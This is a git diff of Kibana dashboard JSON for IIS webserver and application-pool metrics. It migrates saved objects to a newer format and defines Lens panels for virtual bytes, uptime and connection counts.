"datasourceStates": { - "indexpattern": { - "layers": { - "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { - "columnOrder": [ - "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "80ebd176-a8e8-489f-b226-55952da7c11e", - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "columns": { - "35c13f71-7863-401d-8da0-e13af7226004": { - "customLabel": true, - "dataType": "number", - 
"isBucketed": false, - "label": "Virtual Bytes", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.virtual_bytes" - }, - "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "35c13f71-7863-401d-8da0-e13af7226004", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "80ebd176-a8e8-489f-b226-55952da7c11e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.virtual_bytes" + }, + "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "35c13f71-7863-401d-8da0-e13af7226004", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "layerType": "data", - "position": "top", - "seriesType": 
"line", - "showGridlines": false, - "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68bc00", - "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "80ebd176-a8e8-489f-b226-55952da7c11e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 15, - "i": "941273c3-2e8f-4b44-9701-a52fb0f2e221", - "w": 24, - "x": 24, - "y": 41 + "layers": [ + { + "accessors": [ + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68bc00", + "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" + } + ] + } + ], + "legend": { + "isVisible": true, + 
"position": "right", + "showSingleSeries": true }, - "panelIndex": "941273c3-2e8f-4b44-9701-a52fb0f2e221", - "title": "Virtual Bytes", - "type": "lens", - "version": "8.5.0" - } - ], - "timeRestore": false, - "title": "[Metrics IIS] Application Pool Overview", - "version": 1 - }, - "coreMigrationVersion": "8.5.0", - "id": "iis-b4108810-861c-11ea-91bc-ab084c7ec0e7", - "migrationVersion": { - "dashboard": "8.5.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "5cb9f7e0-eb7c-4a40-8746-bf7a38f005f5:indexpattern-datasource-layer-180189b1-7216-4cf8-a803-95b53c2f6e40", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "25c69234-9c74-4179-87f7-3be8a18e4cd9:indexpattern-datasource-layer-0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a7ca9003-7450-4fa8-b26b-58cdaa3a8b5f:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7f2ff86d-01f8-429f-8ff7-8d33db2b2c8e:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "50b288bd-2146-4adf-9afa-85b2b3ee21be:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b76b8a0e-e0fc-4095-bc82-0fa429e28ee8:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cfb96343-c92d-425c-b36c-5153bd4b05e8:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "941273c3-2e8f-4b44-9701-a52fb0f2e221:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "hide", + 
"valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_44559996-134f-4279-8705-0da162d57dc9:optionsListDataView", - "type": "index-pattern" - } + "title": "Virtual Bytes" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics IIS] Application Pool Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "5cb9f7e0-eb7c-4a40-8746-bf7a38f005f5:indexpattern-datasource-layer-180189b1-7216-4cf8-a803-95b53c2f6e40", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "25c69234-9c74-4179-87f7-3be8a18e4cd9:indexpattern-datasource-layer-0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a7ca9003-7450-4fa8-b26b-58cdaa3a8b5f:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7f2ff86d-01f8-429f-8ff7-8d33db2b2c8e:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "50b288bd-2146-4adf-9afa-85b2b3ee21be:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b76b8a0e-e0fc-4095-bc82-0fa429e28ee8:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cfb96343-c92d-425c-b36c-5153bd4b05e8:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "941273c3-2e8f-4b44-9701-a52fb0f2e221:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"controlGroup_44559996-134f-4279-8705-0da162d57dc9:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/iis/kibana/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7.json b/packages/iis/kibana/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7.json index de11c1172ae..31fca83324d 100644 --- a/packages/iis/kibana/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7.json +++ b/packages/iis/kibana/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7.json 
@@ -1,1868 +1,1888 @@ { - "attributes": { - "description": "This dashboard shows metrics for the IIS server.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:17:42.355Z", + "created_at": "2023-11-07T17:17:42.355Z", + "version": "WzEwOCwxXQ==", + "attributes": { + "description": "This dashboard shows metrics for the IIS server.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "22d47dab-cb90-4eda-8b2c-c309a42e85d0", + "w": 10, + "x": 0, + "y": 0 + }, + "panelIndex": "22d47dab-cb90-4eda-8b2c-c309a42e85d0", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "### IIS\n\n[**Webserver**](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [Webserver processes](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [Websites](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [Application Pools](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) \n\n\n\n", + "openLinksInNewTab": false + }, + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true + "title": "Navigation Webserver Overview" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": 
"df67a70e-5ca5-4822-9abf-98f68987176b", + "w": 9, + "x": 10, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } + "panelIndex": "df67a70e-5ca5-4822-9abf-98f68987176b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7d537da3-5163-404f-8219-5848d516628c", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "7d537da3-5163-404f-8219-5848d516628c": { + "columnOrder": [ + "f6a71cc2-db91-4eff-b44a-c8884fb221eb", + "81fcfbf0-0962-40df-968e-f7626bedb39c", + "81fcfbf0-0962-40df-968e-f7626bedb39cX0", + "81fcfbf0-0962-40df-968e-f7626bedb39cX1", + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0", + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX1", + "81fcfbf0-0962-40df-968e-f7626bedb39cX2" + ], + "columns": { + "81fcfbf0-0962-40df-968e-f7626bedb39c": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.service_uptime))/3600", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.service_uptime))/3600", + "isFormulaBroken": false + }, + "references": [ + "81fcfbf0-0962-40df-968e-f7626bedb39cX2" + ], + "scale": "ratio" + }, + "81fcfbf0-0962-40df-968e-f7626bedb39cX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.service_uptime: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.service_uptime))/3600", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.service_uptime" + }, + "81fcfbf0-0962-40df-968e-f7626bedb39cX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part 
of overall_max(last_value(iis.webserver.network.service_uptime))/3600", + "operationType": "overall_max", + "references": [ + "81fcfbf0-0962-40df-968e-f7626bedb39cX0" + ], + "scale": "ratio" + }, + "81fcfbf0-0962-40df-968e-f7626bedb39cX2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.service_uptime))/3600", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "81fcfbf0-0962-40df-968e-f7626bedb39cX1", + 3600 + ], + "location": { + "max": 66, + "min": 0 + }, + "name": "divide", + "text": "overall_max(last_value(iis.webserver.network.service_uptime))/3600", + "type": "function" } + }, + "references": [ + "81fcfbf0-0962-40df-968e-f7626bedb39cX1" + ], + "scale": "ratio" }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "### IIS\n\n[**Webserver**](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [Webserver processes](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [Websites](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [Application Pools](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) \n\n\n\n", - "openLinksInNewTab": false + "f6a71cc2-db91-4eff-b44a-c8884fb221eb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Service Uptime (Hours)", + "operationType": "formula", + "params": { + "formula": "last_value(iis.webserver.network.service_uptime, kql='iis.webserver.network.service_uptime: *')/3600", + "isFormulaBroken": false + }, + "references": [ + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX1" + ], + "scale": "ratio" }, - "type": "markdown", - "uiState": {} + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.service_uptime: *" + }, + "isBucketed": false, + "label": "Part of Service Uptime (Hours)", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" 
+ }, + "scale": "ratio", + "sourceField": "iis.webserver.network.service_uptime" + }, + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Service Uptime (Hours)", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0", + 3600 + ], + "location": { + "max": 100, + "min": 0 + }, + "name": "divide", + "text": "last_value(iis.webserver.network.service_uptime, kql='iis.webserver.network.service_uptime: *')/3600", + "type": "function" + } + }, + "references": [ + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} } - }, - "gridData": { - "h": 5, - "i": "22d47dab-cb90-4eda-8b2c-c309a42e85d0", - "w": 10, - "x": 0, - "y": 0 - }, - "panelIndex": "22d47dab-cb90-4eda-8b2c-c309a42e85d0", - "title": "Navigation Webserver Overview", - "type": "visualization", - "version": "8.5.0" + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#D33115", + "layerId": "7d537da3-5163-404f-8219-5848d516628c", + "layerType": "data", + "maxAccessor": "81fcfbf0-0962-40df-968e-f7626bedb39c", + "metricAccessor": "f6a71cc2-db91-4eff-b44a-c8884fb221eb", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7d537da3-5163-404f-8219-5848d516628c", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "7d537da3-5163-404f-8219-5848d516628c": { - "columnOrder": [ - "f6a71cc2-db91-4eff-b44a-c8884fb221eb", - "81fcfbf0-0962-40df-968e-f7626bedb39c", - "81fcfbf0-0962-40df-968e-f7626bedb39cX0", - "81fcfbf0-0962-40df-968e-f7626bedb39cX1", - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0", - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX1", - "81fcfbf0-0962-40df-968e-f7626bedb39cX2" - ], - "columns": { - 
"81fcfbf0-0962-40df-968e-f7626bedb39c": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.service_uptime))/3600", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.service_uptime))/3600", - "isFormulaBroken": false - }, - "references": [ - "81fcfbf0-0962-40df-968e-f7626bedb39cX2" - ], - "scale": "ratio" - }, - "81fcfbf0-0962-40df-968e-f7626bedb39cX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.service_uptime: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.service_uptime))/3600", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.service_uptime" - }, - "81fcfbf0-0962-40df-968e-f7626bedb39cX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.service_uptime))/3600", - "operationType": "overall_max", - "references": [ - "81fcfbf0-0962-40df-968e-f7626bedb39cX0" - ], - "scale": "ratio" - }, - "81fcfbf0-0962-40df-968e-f7626bedb39cX2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.service_uptime))/3600", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "81fcfbf0-0962-40df-968e-f7626bedb39cX1", - 3600 - ], - "location": { - "max": 66, - "min": 0 - }, - "name": "divide", - "text": "overall_max(last_value(iis.webserver.network.service_uptime))/3600", - "type": "function" - } - }, - "references": [ - "81fcfbf0-0962-40df-968e-f7626bedb39cX1" - ], - "scale": "ratio" - }, - "f6a71cc2-db91-4eff-b44a-c8884fb221eb": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Service Uptime (Hours)", - "operationType": "formula", - "params": 
{ - "formula": "last_value(iis.webserver.network.service_uptime, kql='iis.webserver.network.service_uptime: *')/3600", - "isFormulaBroken": false - }, - "references": [ - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX1" - ], - "scale": "ratio" - }, - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.service_uptime: *" - }, - "isBucketed": false, - "label": "Part of Service Uptime (Hours)", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.service_uptime" - }, - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Service Uptime (Hours)", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0", - 3600 - ], - "location": { - "max": 100, - "min": 0 - }, - "name": "divide", - "text": "last_value(iis.webserver.network.service_uptime, kql='iis.webserver.network.service_uptime: *')/3600", - "type": "function" - } - }, - "references": [ - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#D33115", - "layerId": "7d537da3-5163-404f-8219-5848d516628c", - "layerType": "data", - "maxAccessor": "81fcfbf0-0962-40df-968e-f7626bedb39c", - "metricAccessor": "f6a71cc2-db91-4eff-b44a-c8884fb221eb", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Service Uptime" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "e2566135-ecc8-44a1-bbbd-9281dec8a9cc", + "w": 10, + "x": 19, + "y": 0 + }, + "panelIndex": 
"e2566135-ecc8-44a1-bbbd-9281dec8a9cc", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-07e96b37-8ca1-4d7c-bb37-99e4caa36c6f", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "07e96b37-8ca1-4d7c-bb37-99e4caa36c6f": { + "columnOrder": [ + "e24f827c-2613-4954-880e-f3948d13b892", + "12de5e25-d73e-47bf-a118-f099b68d9b6c", + "12de5e25-d73e-47bf-a118-f099b68d9b6cX0", + "12de5e25-d73e-47bf-a118-f099b68d9b6cX1" + ], + "columns": { + "12de5e25-d73e-47bf-a118-f099b68d9b6c": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.current_connections))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.current_connections))", + "isFormulaBroken": false + }, + "references": [ + "12de5e25-d73e-47bf-a118-f099b68d9b6cX1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 9, - "i": "df67a70e-5ca5-4822-9abf-98f68987176b", - "w": 9, - "x": 10, - "y": 0 - }, - "panelIndex": "df67a70e-5ca5-4822-9abf-98f68987176b", - "title": "Service Uptime", - "type": "lens", - "version": "8.5.0" + "12de5e25-d73e-47bf-a118-f099b68d9b6cX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.current_connections: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.current_connections))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.current_connections" + }, + "12de5e25-d73e-47bf-a118-f099b68d9b6cX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of 
overall_max(last_value(iis.webserver.network.current_connections))", + "operationType": "overall_max", + "references": [ + "12de5e25-d73e-47bf-a118-f099b68d9b6cX0" + ], + "scale": "ratio" + }, + "e24f827c-2613-4954-880e-f3948d13b892": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.current_connections: *" + }, + "isBucketed": false, + "label": "Current Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.current_connections" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#68BC00", + "layerId": "07e96b37-8ca1-4d7c-bb37-99e4caa36c6f", + "layerType": "data", + "maxAccessor": "12de5e25-d73e-47bf-a118-f099b68d9b6c", + "metricAccessor": "e24f827c-2613-4954-880e-f3948d13b892", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-07e96b37-8ca1-4d7c-bb37-99e4caa36c6f", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "07e96b37-8ca1-4d7c-bb37-99e4caa36c6f": { - "columnOrder": [ - "e24f827c-2613-4954-880e-f3948d13b892", - "12de5e25-d73e-47bf-a118-f099b68d9b6c", - "12de5e25-d73e-47bf-a118-f099b68d9b6cX0", - "12de5e25-d73e-47bf-a118-f099b68d9b6cX1" - ], - "columns": { - "12de5e25-d73e-47bf-a118-f099b68d9b6c": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.current_connections))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.current_connections))", - "isFormulaBroken": false - }, - "references": [ - "12de5e25-d73e-47bf-a118-f099b68d9b6cX1" - ], - "scale": "ratio" - }, - "12de5e25-d73e-47bf-a118-f099b68d9b6cX0": 
{ - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.current_connections: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.current_connections))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.current_connections" - }, - "12de5e25-d73e-47bf-a118-f099b68d9b6cX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.current_connections))", - "operationType": "overall_max", - "references": [ - "12de5e25-d73e-47bf-a118-f099b68d9b6cX0" - ], - "scale": "ratio" - }, - "e24f827c-2613-4954-880e-f3948d13b892": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.current_connections: *" - }, - "isBucketed": false, - "label": "Current Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.current_connections" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#68BC00", - "layerId": "07e96b37-8ca1-4d7c-bb37-99e4caa36c6f", - "layerType": "data", - "maxAccessor": "12de5e25-d73e-47bf-a118-f099b68d9b6c", - "metricAccessor": "e24f827c-2613-4954-880e-f3948d13b892", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Current Connections" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "1798fa09-93f8-4dfc-85fa-6fc45fdd723a", + "w": 10, + "x": 29, + "y": 0 + }, + "panelIndex": "1798fa09-93f8-4dfc-85fa-6fc45fdd723a", + "embeddableConfig": { + "attributes": { + 
"references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ec54661b-482d-438e-b841-7ef6909d49a4", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "ec54661b-482d-438e-b841-7ef6909d49a4": { + "columnOrder": [ + "9853690d-6517-4282-b8ed-33f98569a178", + "6f34392d-0eaf-45d3-9b36-54bcbc83e644", + "6f34392d-0eaf-45d3-9b36-54bcbc83e644X0", + "6f34392d-0eaf-45d3-9b36-54bcbc83e644X1" + ], + "columns": { + "6f34392d-0eaf-45d3-9b36-54bcbc83e644": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.maximum_connections))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.maximum_connections))", + "isFormulaBroken": false + }, + "references": [ + "6f34392d-0eaf-45d3-9b36-54bcbc83e644X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 9, - "i": "e2566135-ecc8-44a1-bbbd-9281dec8a9cc", - "w": 10, - "x": 19, - "y": 0 - }, - "panelIndex": "e2566135-ecc8-44a1-bbbd-9281dec8a9cc", - "title": "Current Connections", - "type": "lens", - "version": "8.5.0" + "6f34392d-0eaf-45d3-9b36-54bcbc83e644X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.maximum_connections: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.maximum_connections))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.maximum_connections" + }, + "6f34392d-0eaf-45d3-9b36-54bcbc83e644X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.maximum_connections))", + "operationType": "overall_max", + "references": [ + 
"6f34392d-0eaf-45d3-9b36-54bcbc83e644X0" + ], + "scale": "ratio" + }, + "9853690d-6517-4282-b8ed-33f98569a178": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.maximum_connections: *" + }, + "isBucketed": false, + "label": "Maximum Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.maximum_connections" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#68CCCA", + "layerId": "ec54661b-482d-438e-b841-7ef6909d49a4", + "layerType": "data", + "maxAccessor": "6f34392d-0eaf-45d3-9b36-54bcbc83e644", + "metricAccessor": "9853690d-6517-4282-b8ed-33f98569a178", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": 